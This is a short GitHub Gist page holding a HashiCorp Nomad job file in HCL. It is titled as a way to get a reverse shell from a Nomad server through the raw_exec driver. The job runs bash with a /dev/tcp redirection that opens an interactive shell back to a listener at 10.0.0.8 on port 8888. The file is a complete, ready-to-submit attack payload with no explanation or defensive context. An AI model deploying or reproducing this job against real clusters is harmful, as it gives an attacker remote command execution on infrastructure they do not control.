Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
hcl file to get a reverse shell from the nomad server via raw_exec
job "sploit_service_revshell" {
datacenters = ["dc1"]
group "sploit" {
task "shello" {
driver = "raw_exec"
config {
command = "/bin/bash"
args = ["-c", "bash -i >& /dev/tcp/10.0.0.8/8888 0>&1"]
}
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment